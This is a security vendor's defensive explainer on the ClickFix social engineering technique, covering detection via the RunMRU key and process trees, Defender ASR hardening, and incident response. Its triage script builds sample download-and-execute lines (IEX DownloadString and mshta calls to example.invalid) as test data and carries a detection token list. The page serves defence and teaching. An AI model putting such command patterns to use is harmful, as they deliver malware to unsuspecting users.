Hard2bit

ClickFix

What ClickFix is

ClickFix is a social engineering technique that convinces a victim to copy a piece of text, paste it into a system window (typically the Windows Run dialog opened with Win+R, or a terminal) and press Enter. What runs is PowerShell, mshta, curl, bitsadmin or any interpreter that happens to be available, and it runs with the user's own privileges. The wrapper changes — fake CAPTCHA, simulated Word or Chrome error, fake blue screen, meeting invitation asking for verification — but the underlying mechanic is always the same. The second stage downloads the actual loader and drops infostealers, RATs or access for follow-on campaigns. The technique slips past email gateways, antivirus and classic phishing simulations because the initial content is plain text and execution is started by the user inside their own session.

Why it matters

For an operational security team ClickFix matters because in eighteen months it has moved from a researcher curiosity to one of the dominant email-borne malware delivery vectors in many vendors' telemetry. ESET measured a 517% growth in ClickFix and FakeCAPTCHA campaigns between the second half of 2024 and the first half of 2025. Microsoft's August 2025 blog post "Think before you Click(Fix)" calls it one of the most effective delivery methods seen in years, with thousands of devices affected daily in their global telemetry. Adoption by state-sponsored groups (APT28, Kimsuky, MuddyWater) confirms it is mature enough to be relied upon in espionage operations. The operational consequence is direct: classic awareness training teaches people not to open attachments and not to click suspicious links, but ClickFix asks the user to paste text, an act that office culture treats as harmless. Most organisations have never trained that specific defensive reflex.

Key points

The email body is plain text and gateways find nothing malicious. The intermediate page is often a freshly registered clean domain or a compromised legitimate site, which delays categorisation by web filters. Perimeter detection and blocking arrive late and the decision always ends up in front of the user.

Execution is started by the user inside their own session. Modern EDR and antivirus do not block powershell.exe spawned from explorer.exe by default because it is a normal sequence on any workstation. Detecting it requires inspecting the command line, not the binary, and matching parameters like -EncodedCommand, -nop, -W hidden or IEX.

The HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key stores whatever the user typed in the Run dialog and is the best source of primary evidence. A rule firing on powershell, mshta, curl, IEX, FromBase64String or URLs in that value yields almost zero false positives on healthy corporate endpoints.

Microsoft Defender's Attack Surface Reduction (ASR) rules block several of the behaviours ClickFix relies on: obfuscated scripts, Office child processes, process creation via PsExec or WMI, and unsigned or low-prevalence executables launched on the endpoint. None of them is perfect on its own; the four combined raise the cost of the operation substantially. Disabling Win+R via GPO on standard profiles closes the most common lure.
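The following script is an added example, not Hard2bit's code or a Microsoft-provided tool. It applies on a single test host the controls this section names (the four ASR rules, script block logging and removal of the Run dialog) so their effect can be validated before the same settings are deployed by GPO or Intune. It assumes Windows 10/11 with Microsoft Defender Antivirus, an elevated PowerShell session, and defaults to ASR audit mode; the rule GUIDs are the ones Microsoft documents for those four rules, and the registry paths are the policy equivalents of the GPO settings.

```powershell
# Added example (not Hard2bit's code): apply the page's preventive controls on one test machine.
# Assumptions: Windows 10/11, Microsoft Defender Antivirus, elevated PowerShell 5.1 or later.
# Production deployment belongs in GPO/Intune; this is for validating the settings on one host.
function Set-ClickFixHardening {
    param([switch]$Enforce)   # default is AuditMode so impact can be measured before blocking

    # ASR rule GUIDs as documented by Microsoft for the four behaviours listed in this section.
    $asrRules = [ordered]@{
        'Block all Office applications from creating child processes'                 = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'
        'Block execution of potentially obfuscated scripts'                            = '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC'
        'Block process creations originating from PSExec and WMI commands'            = 'D1E49AAC-8F56-4280-B9BA-993A6D77406C'
        'Block executables unless they meet prevalence, age or trusted-list criteria' = '01443614-CD74-433A-B99E-2ECDC07BFC25'
    }
    $action = if ($Enforce) { 'Enabled' } else { 'AuditMode' }
    foreach ($rule in $asrRules.GetEnumerator()) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $rule.Value `
                         -AttackSurfaceReductionRules_Actions $action
        Write-Host ("[{0}] {1}" -f $action, $rule.Key)
    }

    # Script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) records the
    # decoded content of -EncodedCommand, which is what the SIEM rule in this section needs to see.
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Type DWord -Value 1

    # Remove the Run dialog (and the Win+R hotkey) for the current user: registry equivalent of the
    # "Remove Run menu from Start Menu" user policy that GPO would push to standard profiles.
    $explorerPolicy = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    New-Item -Path $explorerPolicy -Force | Out-Null
    Set-ItemProperty -Path $explorerPolicy -Name NoRun -Type DWord -Value 1

    # Read the ASR state back so the change is verifiable rather than assumed.
    $pref = Get-MpPreference
    for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        [pscustomobject]@{
            Id     = $pref.AttackSurfaceReductionRules_Ids[$i]
            Action = $pref.AttackSurfaceReductionRules_Actions[$i]
        }
    }
}

# Audit first; run with -Enforce once the audit events show no legitimate workflow is affected.
Set-ClickFixHardening | Format-Table -AutoSize
```

The NoRun policy takes effect at the next logon or after explorer.exe restarts. The PsExec/WMI rule is the one most likely to collide with management tooling (software deployment, remote administration), which is why the function defaults to audit mode: ASR audit events appear in Microsoft-Windows-Windows Defender/Operational and can be reviewed before switching to Enabled. AppLocker or WDAC restrictions on mshta, bitsadmin, certutil, regsvr32 and rundll32, and Constrained Language Mode, are deliberately not set here because they require a policy file tuned to the estate.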

The final payload is well documented: Lumma Stealer, NetSupport RAT, AsyncRAT, DanaBot, Latrodectus, XWorm, StealC, Quasar RAT and, in targeted operations, bespoke implants. The intent varies: credential and session cookie theft for fraud, pre-positioning for ransomware or espionage in state-sponsored campaigns.

Useful training does not look like a phishing simulation. What works is a short, sharp operational rule: no legitimate supplier, no internal system and no web page will ever ask you to paste commands into a system window. If they ask, it is fraud. Repeated in training, signage and onboarding it pays better than five email simulations.

Example: a company on Microsoft 365 hunting a ClickFix-delivered Lumma Stealer

A finance workstation in a company that runs email and collaboration on Microsoft 365 receives a link to a supposed bank receipt. The landing page presents a Cloudflare-style CAPTCHA with checkboxes that do not respond and offers a "quick verification" alternative: press Win+R, paste what is already in the clipboard and press Enter. The user complies. The pasted string is a PowerShell line with -EncodedCommand that downloads a second script; within seconds Lumma Stealer is resident in memory and the stealer collects Edge cookies and Microsoft 365 session tokens.

The SOC catches the attack through three concurrent signals. The RunMRU key on that workstation is modified with a value containing powershell and -EncodedCommand and triggers a rule with near-zero false positives. The process tree explorer.exe → powershell.exe with a long command line raises a high-severity EDR alert. An outbound connection from powershell.exe to a freshly registered domain completes the picture. Incident response isolates the endpoint, preserves the RunMRU key and the process tree as evidence, rotates passwords and revokes session tokens in Entra ID, and sweeps the rest of the estate for the same pattern, assuming the campaign will have reached several victims within the same organisation.
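The script below is an added example, not Hard2bit's code, and serves both the command-line matching described under Key points and the RunMRU and process-tree signals in this scenario. It decodes any -EncodedCommand argument (UTF-16LE base64, as PowerShell expects), scores text against the tokens the page names, reads the live RunMRU key in most-recent-first order, and lists running interpreters whose parent is explorer.exe. It assumes Windows with PowerShell 5.1 or later, run as the user being examined (RunMRU lives in that user's HKCU hive); the token list, regex, function names and sample values are this example's own, and the sample entries are constructed rather than taken from a real incident.

```powershell
# Added example (not Hard2bit's code): triage helpers for the RunMRU and process-tree signals.
# Assumptions: PowerShell 5.1+ on Windows, run as the user under examination. Tokens, regex and
# sample values are this example's own; the samples are constructed, not from a real incident.

$SuspiciousTokens = @('powershell', 'pwsh', 'mshta', 'curl', 'bitsadmin', 'certutil', 'iex',
                      'invoke-expression', 'frombase64string', 'encodedcommand', '-nop',
                      '-w hidden', 'downloadstring', 'http://', 'https://')

function ConvertFrom-EncodedCommand {
    # Decodes the base64 UTF-16LE argument of -EncodedCommand. PowerShell also accepts the
    # abbreviations -e, -ec and -enc, which the regex covers. Returns $null if absent or invalid.
    param([string]$Text)
    $m = [regex]::Match($Text, '(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }
}

function Test-ClickFixText {
    # Scores one piece of text (a RunMRU entry or a process command line) against the token list,
    # matching on both the raw text and the decoded -EncodedCommand payload.
    param([string]$Source, [string]$Text)
    $decoded  = ConvertFrom-EncodedCommand -Text $Text
    $haystack = ($Text + ' ' + $decoded).ToLowerInvariant()
    $hits     = @($SuspiciousTokens | Where-Object { $haystack.Contains($_) })
    [pscustomobject]@{
        Source     = $Source
        Text       = $Text
        Decoded    = $decoded
        Suspicious = ($hits.Count -gt 0)
        Matched    = ($hits -join ', ')
    }
}

function Get-ClickFixRunMruHits {
    # Reads the live key. Windows stores each Run dialog entry as "<typed text>\1" under values
    # named a, b, c... and the MRUList value gives their order, most recent first.
    param([string]$Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU')
    if (-not (Test-Path $Path)) { return }
    $key = Get-ItemProperty -Path $Path
    foreach ($letter in ([string]$key.MRUList).ToCharArray()) {
        $prop = $key.PSObject.Properties[[string]$letter]
        if (-not $prop) { continue }
        $typed = ([string]$prop.Value) -replace '\\1$', ''
        Test-ClickFixText -Source "RunMRU\$letter" -Text $typed
    }
}

function Get-ExplorerSpawnedInterpreters {
    # Live view of the explorer.exe -> interpreter tree (running processes only; EDR history is
    # needed for processes that have already exited).
    $interps = 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'curl.exe', 'bitsadmin.exe', 'certutil.exe'
    $all   = Get-CimInstance Win32_Process
    $byPid = @{}
    foreach ($p in $all) { $byPid[[int]$p.ProcessId] = $p }
    foreach ($p in $all) {
        $name = [string]$p.Name
        if ($interps -notcontains $name.ToLower()) { continue }
        $parent = $byPid[[int]$p.ParentProcessId]
        if ($parent -and ([string]$parent.Name) -ieq 'explorer.exe') {
            Test-ClickFixText -Source ("pid $($p.ProcessId) (parent explorer.exe)") -Text ([string]$p.CommandLine)
        }
    }
}

# Constructed sample entries so the scoring can be tried offline; example.invalid never resolves.
$stage2  = 'IEX ((New-Object Net.WebClient).DownloadString(''https://example.invalid/stage2''))'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))
$samples = [ordered]@{
    'sample a' = 'notepad'
    'sample b' = "powershell -nop -w hidden -EncodedCommand $encoded"
    'sample c' = 'mshta https://example.invalid/verify.hta'
}
$samples.GetEnumerator() | ForEach-Object { Test-ClickFixText -Source $_.Key -Text $_.Value } |
    Format-Table Source, Suspicious, Matched -AutoSize

# Live checks on the examined host.
Get-ClickFixRunMruHits | Where-Object Suspicious | Format-List
Get-ExplorerSpawnedInterpreters | Format-List
```

On the constructed samples, only "sample a" comes back with Suspicious set to False; "sample b" matches on the raw tokens and on the decoded payload (iex, downloadstring, https://), which is the reason the decoder matters: a rule that only inspects the raw command line sees the base64 blob and nothing else. During an incident, export the key with `reg export` before any remediation, since the RunMRU values are overwritten as the user keeps using the Run dialog.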

Common mistakes

  • Assuming the email gateway will block ClickFix. The body is plain text; the malicious content does not appear until the second or third hop. The defence must be designed for the user, not for the perimeter.
  • Training staff only with classic phishing simulations. The user receiving the lure does not open an attachment or click a suspicious link: they paste three lines and press Enter. If that reflex is not specifically trained, they will do it.
  • Assuming EDR will catch powershell.exe by default. Heuristics do not fire on explorer.exe → powershell.exe because it is a legitimate sequence; detection requires inspecting the command line, not the binary.
  • Forgetting mshta, bitsadmin, certutil, regsvr32 and rundll32. These LOLBins rarely have legitimate use on employee endpoints and should be blocked with AppLocker or WDAC on profiles that do not need them.
  • Leaving Win+R enabled on standard profiles. Removing the Run dialog through Group Policy does not hurt productivity on office profiles and kills the most widespread ClickFix lure.


Frequently asked questions

What exactly is ClickFix?

A social engineering technique where the attacker convinces the victim to copy a piece of text, paste it into a system window (Run dialog or terminal) and press Enter. What executes is PowerShell, mshta or an equivalent binary that downloads malware with the user's privileges. The wrapper changes (fake CAPTCHA, Word error, fake BSOD) but the mechanic stays the same.

Why does ClickFix bypass traditional controls?

The email is plain text and gateways find nothing malicious; execution is started by the user inside their session and uses a Microsoft-signed binary; and classic awareness training teaches people not to open attachments or click links, but ClickFix asks them to paste text, an act office culture treats as harmless.

Is ClickFix the same as phishing?

It shares the social engineering layer, but the technical chain is different. Traditional phishing asks for a click or an attachment open. ClickFix asks the victim to paste text into the system and press Enter. That is why it bypasses many filters and a large share of phishing simulations.

How is ClickFix detected inside an organisation?

Three observation points. The RunMRU key under HKCU stores what was typed into the Run dialog; any value containing powershell, mshta, curl, IEX or EncodedCommand is highly suspicious. The process tree explorer.exe → powershell.exe with long encoded parameters is another. Outbound connections from powershell.exe or mshta.exe to freshly registered domains close the picture.

Which preventive controls work?

Microsoft Defender ASR rules blocking obfuscated scripts, Office child processes and unsigned executions; Win+R disabled by GPO on standard profiles; PowerShell Constrained Language Mode with script block logging shipped to the SIEM; AppLocker or WDAC restricting mshta, bitsadmin, certutil, regsvr32 and rundll32; and phishing-resistant MFA on privileged access to limit the damage if credentials are stolen.

What do I do if an endpoint has already fallen?

Isolate the workstation, preserve the RunMRU key and the process tree as evidence, rotate passwords and revoke session tokens in the IdP, sweep the estate for the same indicators and open the formal incident response procedure. ClickFix campaigns typically reach several victims inside the same organisation before one of them succeeds.